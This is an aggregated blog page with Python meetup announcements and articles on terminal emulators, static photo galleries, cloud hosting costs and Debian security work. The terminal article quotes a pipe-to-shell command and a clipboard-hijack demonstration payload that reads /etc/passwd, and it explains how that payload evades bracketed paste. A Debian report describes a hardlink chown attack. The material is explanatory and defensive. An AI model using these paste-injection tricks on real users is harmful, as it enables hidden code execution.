Skip to main content

External Blogs

Montréal-Python 71 - Burning Yeti

Montreal Python - dim, 04/15/2018 - 23:00

Hey!

We are looking for speakers for our next Montreal-Python meetup. Submit your proposals (up to 30 minutes) at team@montrealpython.org or come join us in our Slack if you would like to discuss about it at http://slack.mtlpy.org/

Cheers!

When

Monday, May 7th, 2018, 6:00PM-9:00PM

Where

TBD

Catégories: External Blogs

A look at terminal emulators, part 1

Anarcat - jeu, 03/29/2018 - 19:00

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal Debian Fedora Upstream Notes Alacritty N/A N/A 6debc4f no releases, Git head GNOME Terminal 3.22.2 3.26.2 3.28.0 uses GTK3, VTE Konsole 16.12.0 17.12.2 17.12.3 uses KDE libraries mlterm 3.5.0 3.7.0 3.8.5 uses VTE, "Multi-lingual terminal" pterm 0.67 0.70 0.70 PuTTY without ssh, uses GTK2 st 0.6 0.7 0.8.1 "simple terminal" Terminator 1.90+bzr-1705 1.91 1.91 uses GTK3, VTE urxvt 9.22 9.22 9.22 main rxvt fork, also known as rxvt-unicode Xfce Terminal 0.8.3 0.8.7 0.8.7.2 uses GTK3, VTE xterm 327 330 331 the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command: git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello "; whoami|tr -d '\n'; echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \ Here'"'"'s the first line of your /etc/passwd: '; head -n1 /etc/passwd git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Montréal-Python 70 - Atomic Zucchini

Montreal Python - mar, 03/27/2018 - 23:00

It is with pleasure that we announce the presentations of our 70th meetup. Unexpected events forced us to postpone last month's meetup. But don't worry, we are back in force with a menu full of python delights!

Thanks to Shopify for sponsoring this event by providing the venue and pizza!

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 7:30PM - Break
  • 7:45PM - Presentations
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations SikuliX: automatise tout ce que tu vois avec 1 seul outil (Windows, Mac, Linux) - Dominik Seelos

SikuliX est un outtils d’automation qui nous permet de scripter (en python 2.7) des tâches récursives avec très très peu d’expérience en automation. SikuliX fonctionne par reconnaissance d’image et peut faire tout ce qu’un clavier souris peuvent (Windows, Mac et Linux)

Automate All The Things with Home Assistant - Philippe Gauthier Passeriez-vous une entrevue de data scientist junior? - Nicolas Coallier

Démontrer les modules et le niveau en python nécessaire pour être embaucher à titre de data scientist junior dans une entreprise. Nous avons un test interne en python que nous faisons passer lors des entrevues. Je passerai à travers le test qui contient les réponses.

Modules abordés: Pandas, Numpy, Sklearn, Beatufiulsoup, re... Théorie ML abordé: Classification, Segmentation, LSTM, Boosting Autres volets abordé: Scrapping, NLP , structure des données

When

Monday, April 9th, 2018 at 6h00PM

Where

Shopify, 490 rue de la Gauchetière Montréal, Québec

Catégories: External Blogs

Montréal-Python 70 - Call for speakers - Atomic Zucchini

Montreal Python - mar, 03/13/2018 - 23:00

The next Montréal-Python will be happening between Easter and your next sugar shack trip!

As always, we are looking for speakers!

Submit your proposals up to 30 minutes at team@montrealpython.org or come join us in our Slack if you would like to discuss about it at http://slack.mtlpy.org/

Cheers!

When

Monday, March 12th, 2018, 6:00PM-9:00PM

Where

TBD

Catégories: External Blogs

Montréal-Python 70 is gonna be in April

Montreal Python - ven, 03/09/2018 - 00:00

Hello,

Unfortunately next Monday's meetup (March 12th) need to be postponed to next month.

Please send us your talk propositions by email to: mtlpyteam@googlegroups.com

See you in April for MP70 Atomic Zuccini!

Catégories: External Blogs

Easy photo galleries with Sigal

Anarcat - mar, 03/06/2018 - 19:00

Sigal is a "simple static gallery generator" with a straightforward design, a nice feature set, and great themes. It was started as a toy project, but has nevertheless grown into a sizable and friendly community. After struggling with maintenance using half a dozen photo gallery projects along the way, I feel I have found a nice little gem that I am happy to share with LWN readers.

CMS vs. SSG

Sigal is part of a growing family of static site generators (SSG), software that generates web sites as static HTML files as opposed to more elaborate Content Management Systems (CMS) that generate HTML content on the fly. A CMS requires specialized server-side software that needs maintenance to keep up to date with security fixes. That software is always running and exposed on the network, whereas a site generated with an SSG is only a collection of never-changing files. This drastically reduces the attack surface as visitors do not (usually) interact with the software directly. Finally, web servers can deliver static content much faster than dynamic content, which means SSGs can offer better performance than a CMS.

Having contributed to a major PHP-based CMS for over a decade, I was glad to finally switch to a SSG (ikiwiki) for my own web site three years ago. My photo gallery, however, was still running on a CMS: after running the venerable Gallery software (in hibernation since 2014), then Coppermine, I ended up using Piwigo. But that required a PHP-enabled web server, which meant chasing an endless stream of security issues. While I did consider non-PHP alternatives like MediaGoblin, that seemed too complicated (requiring Celery, Paste, and PostgreSQL). Really, static site generators had me hooked and there was no turning back.

Initially, I didn't use Sigal, as I first stumbled upon PhotoFloat. It is the brainchild of Jason A. Donenfeld—the same person behind the pass password manager that we previously covered and the WireGuard virtual private network (VPN) as well. PhotoFloat is a small Python program that generates a static gallery running custom JavaScript code. I was enthusiastic about the project: I packaged it for Debian and published patches to implement RSS feeds and multiple gallery support. Unfortunately, patches from contributors would just sit on the mailing list without feedback for months which led to some users forking the project. Donenfeld was not happy with the result; he decried the new PHP dependency and claimed the fork introduced a directory traversal vulnerability. The fork now seems to be more active than the original and was renamed to MyPhotoShare. But at that point, I was already looking for alternatives and found out about Sigal when browsing a friend's photo gallery.

What is Sigal?

Sigal was created by a French software developer from Lyon, Simon Conseil. In an IRC interview, he said that he started working on Sigal as a "toy project to learn Python", as part of his work in Astrophysics data processing at the Very Large Telescope in Chile:

A few years ago, I was already working on astrophysics but with another language (IDL): proprietary, and expensive, like MATLAB. Python was getting used more widely, with the birth of Astropy. So wanting to learn Python, I started to contribute to Pelican, and had the idea to do the same for photo galleries. I was using Piwigo, and felt I didn't need the more dynamic parts (comments, stars, etc.). A static site is so much simpler with some JavaScript library to do most of the job. Add some glue to create the pages, and Sigal was born!

Before starting a new project from scratch, Conseil first looked for alternatives ("Gallerize, lazygal, and a few others") but couldn't find anything satisfactory. He wanted to reuse ideas from Pelican, for example the Jinja2 template engine for themes and the Blinker plugin system, so he started his own project.

Like other static gallery generators, Sigal parses a tree of images and generates thumbnails and HTML pages to show those images. Instead of deploying its own custom JavaScript application for browsing images in the browser, Sigal reuses existing applications like Galleria, PhotoSwipe, and Colorbox. Image metadata is parsed from Exif tags, but a Markdown-formatted text file can also be used to change image or album titles, description, and location. The latest 1.4 release can also read metadata from in-image IPTC tags. Sigal parses regular images using the Pillow library but can also read video files, which get converted to browser-readable video files through the ubiquitous FFmpeg. Sigal has good (if minimal) online documentation and, like any good Python program, can be installed with pip; I am working on packaging it for Debian.

Plugins offer support for image or copyright watermarks. The adjust plugin also allows for minor image adjustments, although those apply to the whole gallery so it is unclear to me how useful that plugin really is. Even novice photographers would more likely make adjustments in a basic image editor like Shotwell, digiKam, or maybe even GIMP before trying to tweak images in a Python configuration file. Finally, another plugin provides a simple RSS feed, which is useful to allow users to keep track of the latest images published in the gallery.

Future plans and limitations

When I asked him about future plans, Conseil said he had "no roadmap":

For me Sigal has been doing its job for a long time now, but the cool thing is that people find it useful and contribute. So my only wish is that this continues and to help the project live for and by its community, which is slowly growing.

Following this lead, I submitted patches and ideas of my own to the project while working on this article. The first shortcoming I have found with Sigal is the lack of access control. A photo gallery is either private or world-readable; there is no way to restrict access to only some albums or photos. I found a way, however, to implement folder password protection using the Basic authentication type for the Apache web server, which I documented in an FAQ entry. It's a little clunky as it uses password files managed through the old htpasswd command. It also means using passwords and, in my usability tests, some family members had trouble typing my weird randomly generated passwords on their tablets. I would have preferred to find a way to use URL-based authentication, with an unguessable one-time link, but I haven't found an easy way to do this in the web server. It can be done by picking a random name for the entire gallery, but not for specific folders, because those get leaked by Sigal. To protect certain pictures, they have to be in a separate gallery, which complicates maintenance.

Which brings us to gallery operation: to create a Sigal gallery, you need to create a configuration file and run the sigal build command. This is pretty simple but I think it can be made even simpler. I have proposed having a default configuration file so that creating a configuration file isn't required to make new galleries. I also looked at implementing a "daemon" mode that would watch a directory for changes and rebuild when new pictures show up. For now, I have settled on a quick hack based on the entr utility but there's talk of implementing the feature directly in the build command. Such improvements would enable mass hosting of photo galleries with minimal configuration. It would also make it easier to create password-less private galleries with unique, unguessable URLs.

Another patch I am working on is the stream plugin, which creates a new view of the gallery; instead of a folder-based interface, this shows the latest pictures published as a flat list. This is how commercial services like Instagram and Flickr work; even though you can tag pictures or group them by folder, they also offer a unified "stream" view of the latest entries in a gallery. As a demonstration of Sigal's clean design, I was able to quickly find my way in the code base to implement the required changes to the core libraries and unit tests, which are now waiting for review.

In closing, I have found Sigal to be a simple and elegant project. As it stands, it should be sufficient for basic galleries, but more demanding photographers and artists might need more elaborate solutions. Ratings, comments, and any form of interactivity will obviously be difficult to implement in Sigal; fans of those features should probably look at CMS solutions like Piwigo or the new Lychee project. But dynamic features are perhaps best kept to purpose-built free software like Discourse that embeds dynamic controls in static sites. In any case, for a system administrator tired of maintaining old software, the idea of having only static web sites to worry about is incredibly comforting. That simplicity and reliability has made Sigal a key tool in my amateur photographer toolbox.

A set of demos is available for readers who want to see more themes and play around with a real gallery.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

February 2018 report: LTS, ...

Anarcat - jeu, 03/01/2018 - 12:07
Debian Long Term Support (LTS)

This is my monthly Debian LTS report. This month was exclusively dedicated to my frontdesk work. I actually forgot to do it the first week and had to play catchup during the weekend, so I brought up a discussion about how to avoid those problems in the future. I proposed an automated reminder system, but it turns out people found this was overkill. Instead, Chris Lamb suggested we simply send a ping to the next person in the list, which has proven useful the next time I was up. In the two weeks I was frontdesk, I ended up triaging the following notable packages:

  • isc-dhcp - remote code execution exploits - time to get rid of those root-level daemons?
  • simplesamlphp - under embargo, quite curious
  • golang - the return of remote code execution in go get (CVE-2018-6574, similar to CVE-2017-15041 and CVE-2018-7187) - ended up being marked as minor, unfortunately
  • systemd - CVE-2017-18078 was marked as unimportant as this was neutralized by kernel hardening and systemd was not really in use back in wheezy. besides, CVE-2013-4392 was about a similar functionality which was claimed to not be supported in wheezy. i did, however, proposed to forcibly enable the kernel hardening through default sysctl configurations (Debian bug #889098) so that custom kernels would be covered by the protection in stable suites.

There were more minor triage work not mentioned here, those are just the juicy ones...

Speaking of juicy, the other thing I did during the month was to help with the documentation on the Meltdown and Spectre attacks on Intel CPUs. Much has been written about this and I won't do yet another summary. However, it seems that no one actually had written even semi-official documentation on the state of fixes in Debian, which lead to many questions to the (LTS) security team(s). Ola Lundqvist did a first draft of a page detailing the current status, and I expanded on the page to add formatting and more details. The page is visible here:

https://wiki.debian.org/DebianSecurity/SpectreMeltdown

I'm still not fully happy with the results: we're missing some userland like Qemu and a timeline of fixes. In comparison, the Ubuntu page still looks much better in my opinion. But it's leagues ahead of what we had before, which was nothing... The next step for LTS is to backport the retpoline fixes back into a compiler. Roberto C. Sanchez is working on this, and the remaining question is whether we try to backport to GCC 4.7 or we backport GCC 4.9 itself into wheezy. In any case, it's a significant challenge and I'm glad I'm not the one dealing with such arcane code right now...

Other free software work

Not much to say this month, en vrac:

  • did the usual linkchecker maintenance
  • finally got my Prometheus node exporter directory size sample merged
  • added some docs updating the Dat project comparison with IPFS after investigating Dat. Turns out Dat's security garantees aren't as good as I hoped...
  • reviewed some PRs in the Git-Mediawiki project
  • found what I consider to be a security issue in the Borg backup software, but was disregarded as such by upstream. This ended up in a simple issue that I do not hope much from.
  • so I got more interested in the Restic community as well. I proposed a code of conduct to test the waters, but the feedback so far has been mixed, unfortunately.
  • started working on a streams page for the Sigal gallery. Expect an article about Sigal soon.
  • published undertime in Debian, which brought a slew of bug reports (and consequent fixes).
  • started looking at alternative GUIs because GTK2 is going a way and I need to port two projects. I have a list of "hello world" in various frameworks now, still not sure which one I'll use.
  • also worked on updating the Charybdis and Atheme-services packages with new co-maintainers (hi!)
  • worked with Darktable to try and render an exotic image out of my new camera. Might turn into a LWN article eventually as well.
  • started getting more involved in the local free software forum, a nice little community. In particular, i went to a "repair cafe" and wrote a full report on the experience there.

I'm trying to write more for LWN these days so it's taking more time. I'm also trying to turn those reports into articles to help ramping up that rhythm, which means you'll need to subscribe to LWN to get the latest goods before the 2 weeks exclusivity period.

Catégories: External Blogs

The cost of hosting in the cloud

Anarcat - mer, 02/28/2018 - 12:00

This is one part of my coverage of KubeCon Austin 2017. Other articles include:

Should we host in the cloud or on our own servers? This question was at the center of Dmytro Dyachuk's talk, given during KubeCon + CloudNativeCon last November. While many services simply launch in the cloud without the organizations behind them considering other options, large content-hosting services have actually moved back to their own data centers: Dropbox migrated in 2016 and Instagram in 2014. Because such transitions can be expensive and risky, understanding the economics of hosting is a critical part of launching a new service. Actual hosting costs are often misunderstood, or secret, so it is sometimes difficult to get the numbers right. In this article, we'll use Dyachuk's talk to try to answer the "million dollar question": "buy or rent?"

Computing the cost of compute

So how much does hosting cost these days? To answer that apparently trivial question, Dyachuk presented a detailed analysis made from a spreadsheet that compares the costs of "colocation" (running your own hardware in somebody else's data center) versus those of hosting in the cloud. For the latter, Dyachuk chose Amazon Web Services (AWS) as a standard, reminding the audience that "63% of Kubernetes deployments actually run off AWS". Dyachuk focused only on the cloud and colocation services, discarding the option of building your own data center as too complex and expensive. The question is whether it still makes sense to operate your own servers when, as Dyachuk explained, "CPU and memory have become a utility", a transition that Kubernetes is also helping push forward.

Another assumption of his talk is that server uptime isn't that critical anymore; there used to be a time when system administrators would proudly brandish multi-year uptime counters as a proof of server stability. As an example, Dyachuk performed a quick survey in the room and the record was an uptime of 5 years. In response, Dyachuk asked: "how many security patches were missed because of that uptime?" The answer was, of course "all of them". Kubernetes helps with security upgrades, in that it provides a self-healing mechanism to automatically re-provision failed services or rotate nodes when rebooting. This changes hardware designs; instead of building custom, application-specific machines, system administrators now deploy large, general-purpose servers that use virtualization technologies to host arbitrary applications in high-density clusters.

When presenting his calculations, Dyachuk explained that "pricing is complicated" and, indeed, his spreadsheet includes hundreds of parameters. However, after reviewing his numbers, I can say that the list is impressively exhaustive, covering server memory, disk, and bandwidth, but also backups, storage, staffing, and networking infrastructure.

For servers, he picked a Supermicro chassis with 224 cores and 512GB of memory from the first result of a Google search. Once amortized over an aggressive three-year rotation plan, the $25,000 machine ends up costing about $8,300 yearly. To compare with Amazon, he picked the m4.10xlarge instance as a commonly used standard, which currently offers 40 cores, 160GB of RAM, and 4Gbps of dedicated storage bandwidth. At the time he did his estimates, the going rate for such a server was $2 per hour or $17,000 per year. So, at first, the physical server looks like a much better deal: half the price and close to quadruple the capacity. But, of course, we also need to factor in networking, power usage, space rental, and staff costs. And this is where things get complicated.

First, colocation rates will vary a lot depending on location. While bandwidth costs are often much lower in large urban centers because of proximity to fast network links, real estate and power prices are often much higher. Bandwidth costs are now the main driver in hosting costs.

For the purpose of his calculation, Dyachuk picked a real-estate figure of $500 per standard cabinet (42U). His calculations yielded a monthly power cost of $4,200 for a full rack, at $0.50/kWh. Those rates seem rather high for my local data center, where that rate is closer to $350 for the cabinet and $0.12/kWh for power. Dyachuk took into account that power is usually not "metered billing", when you pay for the actual power usage, but "stepped billing" where you pay for a circuit with a (say) 25-amp breaker regardless of how much power you use in said circuit. This accounts for some of the discrepancy, but the estimate still seems rather too high to be accurate according to my calculations.

Then there's networking: all those machines need to connect to each other and to an uplink. This means finding a bandwidth provider, which Dyachuk pinned at a reasonable average cost of $1/Mbps. But the most expensive part is not the bandwidth; the cost of managing network infrastructure includes not only installing switches and connecting them, but also tracing misplaced wires, dealing with denial-of-service attacks, and so on. Cabling, a seemingly innocuous task, is actually the majority of hardware expenses in data centers, as previously reported. From networking, Dyachuk went on to detail the remaining cost estimates, including storage and backups, where the physical world is again cheaper than the cloud. All this is, of course, assuming that crafty system administrators can figure out how to glue all the hardware together into a meaningful package.

Which brings us to the sensitive question of staff costs; Dyachuk described those as "substantial". These costs are for the system and network administrators who are needed to buy, order, test, configure, and deploy everything. Evaluating those costs is subjective: for example, salaries will vary between different countries. He fixed the person yearly salary costs at $250,000 (counting overhead and an actual $150,000 salary) and accounted for three people on staff. Those costs may also vary with the colocation service; some will include remote hands and networking, but he assumed in his calculations that the costs would end up being roughly the same because providers will charge extra for those services.

Dyachuk also observed that staff costs are the majority of the expenses in a colocation environment: "hardware is cheaper, but requires a lot more people". In the cloud, it's the opposite; most of the costs consist of computation, storage, and bandwidth. Staff also introduce a human factor of instability in the equation: in a small team, there can be a lot of variability in ability levels. This means there is more uncertainty in colocation cost estimates.

In our discussions after the conference, Dyachuk pointed out a social aspect to consider: cloud providers are operating a virtual oligopoly. Dyachuk worries about the impact of Amazon's growing power over different markets:

A lot of businesses are in direct competition with Amazon. A fear of losing commercial secrets and being spied upon has not been confirmed by any incidents yet. But Walmart, for example, moved out of AWS and requested that its suppliers do the same.

Demand management

Once the extra costs described are factored in, colocation still would appear to be the cheaper option. But that doesn't take into account the question of capacity: a key feature of cloud providers is that they pool together large clusters of machines, which allow individual tenants to scale up their services quickly in response to demand spikes. Self-hosted servers need extra capacity to cover for future demand. That means paying for hardware that stays idle waiting for usage spikes, while cloud providers are free to re-provision those resources elsewhere.

Satisfying demand in the cloud is easy: allocate new instances automatically and pay the bill at the end of the month. In a colocation, provisioning is much slower and hardware must be systematically over-provisioned. Those extra resources might be used for preemptible batch jobs in certain cases, but workloads are often "transaction-oriented" or "realtime" which require extra resources to deal with spikes. So the "spike to average" ratio is an important metric to evaluate when making the decision between the cloud and colocation.

Cost reductions are possible by improving analytics to reduce over-provisioning. Kubernetes makes it easier to estimate demand; before containerized applications, estimates were per application, each with its margin of error. By pooling together all applications in a cluster, the problem is generalized and individual workloads balance out in aggregate, even if they fluctuate individually. Therefore Dyachuk recommends to use the cloud when future growth cannot be forecast, to avoid the risk of under-provisioning. He also recommended "The Art of Capacity Planning" as a good forecasting resource; even though the book is old, the basic math hasn't changed so it is still useful.

The golden ratio

Colocation prices finally overshoot cloud prices after adding extra capacity and staff costs. In closing, Dyachuk identified the crossover point where colocation becomes cheaper at around $100,000 per month, or 150 Amazon m4.2xlarge instances, which can be seen in the graph below. Note that he picked a different instance type for the actual calculations: instead of the largest instance (m4.10xlarge), he chose the more commonly used m4.2xlarge instance. Because Amazon pricing scales linearly, the math works out to about the same once reserved instances, storage, load balancing, and other costs are taken into account.

He also added that the figure will change based on the workload; Amazon is more attractive with more CPU and less I/O. Inversely, I/O-heavy deployments can be a problem on Amazon; disk and network bandwidth are much more expensive in the cloud. For example, bandwidth can sometimes be more than triple what you can easily find in a data center.

Your mileage may vary; those numbers shouldn't be taken as an absolute. They are a baseline that needs to be tweaked according to your situation, workload and requirements. For some, Amazon will be cheaper, for others, colocation is still the best option.

He also emphasized that the graph stops at 500 instances; beyond that lies another "wall" of investment due to networking constraints. At around the equivalent of 2000-3000 Amazon instances, networking becomes a significant bottleneck and demands larger investments in networking equipment to upgrade internal bandwidth, which may make Amazon affordable again. It might also be that application design should shift to a multi-cluster setup, but that implies increases in staff costs.

Finally, we should note that some organizations simply cannot host in the cloud. In our discussions, Dyachuk specifically expressed concerns about Canada's government services moving to the cloud, for example: what is the impact on state sovereignty when confidential data about its citizen ends up in the hands of private contractors? So far, Canada's approach has been to only move "public data" to the cloud, but Dyachuk pointed out this already includes sensitive departments like correctional services.

In Dyachuk's model, the cloud offers significant cost reduction over traditional hosting in small clusters, at least until a deployment reaches a certain size. However, different workloads significantly change that model and can make colocation attractive again: I/O and bandwidth intensive services with well-planned growth rates are clear colocation candidates. His model is just a start; any project manager would be wise to make their own calculations to confirm the cloud really delivers the cost savings it promises. Furthermore, while Dyachuk wisely avoided political discussions surrounding the impact of hosting in the cloud, data ownership and sovereignty remain important considerations that shouldn't be overlooked.

A YouTube video and the slides [PDF] from Dyachuk's talk are available online.

This article first appeared in the Linux Weekly News, under the title "The true costs of hosting in the cloud".

Catégories: External Blogs

Montréal-Python 70: Atomic Zucchini - Call For Proposals

Montreal Python - lun, 02/26/2018 - 00:00

We are looking for speakers for our next meetup. It's your chance to show to the community what you've discovered with your favorite language.

Submit your proposal of 20 to 30 minutes, or even a lightning talk proposals (5 min) at team@montrealpython.org or come join us in our slack channel if you would like to discuss about it at http://slack.mtlpy.org/

When

Monday, March 12th, 2018

Where

Shopify offices

490 Rue de la Gauchetière O,

Montréal, QC H2Z 0B2

https://goo.gl/maps/kFbDrJYsqtS2

Catégories: External Blogs

January 2018 report: LTS

Anarcat - ven, 02/02/2018 - 17:25

I have already published a yearly report which covers all of 2017 but also some of my January 2018 work, so I'll try to keep this short.

Debian Long Term Support (LTS)

This is my monthly Debian LTS report. I was happy to switch to the new Git repository for the security tracker this month. It feels like some operations (namely pull / push) are a little slower, but others, like commits or log inspection, are much faster. So I think it is a net win.

jQuery

I did some work on trying to cleanup a situation with the jQuery package, which I explained in more details in a long post. It turns out there are multiple databases out there that track security issues in web development environemnts (like Javascript, Ruby or Python) but do not follow the normal CVE tracking system. This means that Debian had a few vulnerabilities in its jQuery packages that were not tracked by the security team, in particular three that were only on Snyk.io (CVE-2012-6708, CVE-2015-9251 and CVE-2016-10707). The resulting discussion was interesting and is worth reading in full.

A more worrying aspect of the problem is that this problem is not limited to flashy new web frameworks. Ben Hutchings estimated that almost half of the Linux kernel vulnerabilities are not tracked by CVE. It seems the concensus is that we want to try to follow the CVE process, and Mitre has been helpful in distributing this by letting other entities, called CVE Numbering Authorities or CNA, issue their own CVEs. After contacting Snyk, it turns out that they have started the process of becoming a CNA and are trying to get this part of their workflow, so that's a good sign.

LTS meta-work

I've done some documentation and architecture work on the LTS project itself, mostly around updating the wiki with current practices.

OpenSSH DLA

I've done a quick security update of OpenSSH for LTS, which resulted in DLA-1257-1. Unfortunately, after a discussion with the security researcher that published that CVE, it turned out that this was only a "self-DOS", i.e. that the NEWKEYS attack would only make the SSH client terminate its own connection, and therefore not impact the rest of the server. One has to wonder, in that case, why this was issue a CVE at all: presumably the vulnerability could be leveraged somehow, but I did not look deeply enough into it to figure that out.

Hopefully the patch won't introduce a regression: I tested this summarily and it didn't seem to cause issue at first glance.

Hardlinks attacks

An interesting attack (CVE-2017-18078) was discovered against systemd where the "tmpfiles" feature could be abused to bypass filesystem access restrictions through hardlinks. The trick is that the attack is possible only if kernel hardening (specifically fs.protected_hardlinks) is turned off. That feature is available in the Linux kernel since the 3.6 release, but was actually turned off by default in 3.7. In the commit message, Linus Torvalds explained the change was breaking some userland applications, which is a huge taboo in Linux, and recommended that distros configure this at boot instead. Debian took the reverse approach and Hutchings issued a patch which reverts the default to the more secure default. But this means users of custom kernels are still vulnerable to this issue.

But, more importantly, this affects more than systemd. The vulnerability also happens when using plain old chown with hardening turned off, when running a simple command like this:

chown -R non-root /path/owned/by/non-root

I didn't realize this, but hardlinks share permissions: if you change permissions on file a that's hardlinked to file b, both files have the new permissions. This is especially nasty if users can hardlink to critical files like /etc/password or suid binaries, which is why the hardening was introduced in the first place.

